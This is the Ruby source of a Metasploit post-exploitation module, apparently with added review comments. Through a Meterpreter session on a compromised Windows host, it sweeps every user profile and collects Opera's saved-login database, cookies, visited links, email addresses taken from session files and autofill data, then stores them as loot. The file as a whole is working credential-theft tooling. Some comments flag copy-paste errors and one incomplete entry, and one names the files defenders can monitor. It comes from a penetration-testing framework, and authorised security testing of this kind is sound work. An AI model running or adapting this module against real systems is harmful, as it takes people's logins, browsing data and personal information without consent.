GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/opera.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
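# Post module that walks every Windows user profile reachable from a
# Meterpreter session and hands the ARTIFACTS table below to the PackRat mixin
# (`run_packrat`), which does the actual file collection and parsing.
class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Declarative description of the Opera files this module asks PackRat for.
  # Every entry points at `path: 'AppData'`, `dir: 'Opera Software'` plus one
  # file name; how PackRat resolves those into a full path is defined in the
  # mixin, not here. For defenders, the file names listed below are the ones
  # whose reads by a process other than the browser are worth alerting on.
  #
  # `filetypes` values double as the choices of the ARTIFACTS option (see
  # #initialize), so they are part of the module's user-facing interface.
  # `freeze` is shallow: the nested hashes and arrays stay mutable.
  ARTIFACTS =
    {
      application: 'opera',
      app_category: 'browsers',
      gatherable_artifacts: [
        {
          # Saved-login database. Only action_url and username_value are
          # selected; the query does not name a password column.
          filetypes: 'logins',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Login Data',
          # Was "Opera's sent and received emails", which did not match the
          # 'Login Data' file / 'logins' table this entry reads.
          description: "Opera's saved login entries",
          credential_type: 'sqlite',
          sql_search: [
            {
              # Label previously named SRware (copied from another module).
              sql_description: "Database Commands which exports Opera's Login data",
              sql_table: 'logins',
              sql_column: 'action_url, username_value'
            }
          ]
        },
        {
          # Cookie database: host, cookie name and path only (no value column).
          filetypes: 'cookies',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Cookies',
          description: "Opera's Cookies",
          credential_type: 'sqlite',
          sql_search: [
            {
              # Label previously read "SRware's Login data" for the cookies table.
              sql_description: "Database Commands which exports Opera's cookie data",
              sql_table: 'cookies',
              sql_column: 'host_key, name, path'
            }
          ]
        },
        {
          # NOTE(review): this entry targets 'Visited Links' with
          # credential_type 'database', yet its sql_search repeats the cookies
          # table/columns and the sql_description is cut off. It looks like an
          # unfinished copy of the cookies entry; confirm against the PackRat
          # mixin whether sql_search is even consulted for this type. Left
          # unchanged because the intended query is not visible here.
          filetypes: 'web_history',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Visited Links',
          description: "Opera's Visited Links",
          credential_type: 'database',
          sql_search: [
            {
              sql_description: 'Database Commands which exports ',
              sql_table: 'cookies',
              sql_column: 'host_key, name, path'
            }
          ]
        },
        {
          # Text search over session files for anything following "email=".
          # The inline flags make the pattern case-insensitive.
          filetypes: 'Email',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Session*',
          description: 'Emails stored in session file',
          credential_type: 'text',
          regex_search: [
            {
              extraction_description: 'searches for Email TO/FROM address',
              extraction_type: 'Email addresses',
              regex: [
                '(?i-mx:email=.*)',
              ]
            }
          ]
        },
        {
          # The misspelling in `filetypes` is kept on purpose: the string is an
          # accepted value of the ARTIFACTS option, so correcting it would
          # break existing invocations and resource scripts.
          filetypes: 'personal infomration',
          path: 'AppData',
          dir: 'Opera Software',
          artifact_file_name: 'Web Data',
          # Was 'Auto filles sotred in the database' (typos only).
          description: 'Autofill entries stored in the database',
          credential_type: 'sqlite',
          sql_search: [
            {
              sql_description: 'Database Commands which exports stored auto-fill data',
              sql_table: 'autofill',
              sql_column: 'name, value'
            }
          ]
        }
      ]
    }.freeze

  # Registers module metadata and the user-settable options.
  #
  # @param info [Hash] metadata overrides, merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Opera Credential Gatherer',
        'Description' => %q{
          This module searches for Opera credentials on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        # NOTE(review): STORE_LOOT and EXTRACT_DATA default to true below;
        # confirm in the PackRat mixin that nothing is written on the target so
        # that the empty SideEffects list stays accurate.
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        # The enum choices are 'All' followed by the distinct `filetypes`
        # values of the ARTIFACTS table defined above.
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
      ]
    )
  end

  # Prints the active option values, then runs PackRat once per user profile
  # returned by grab_user_profiles.
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # One PackRat pass per profile; filtering by the ARTIFACTS option is not
    # done here, so it presumably happens inside run_packrat via the datastore.
    grab_user_profiles.each do |userprofile|
      run_packrat(userprofile, ARTIFACTS)
    end

    print_status 'PackRat credential sweep completed'
  end
end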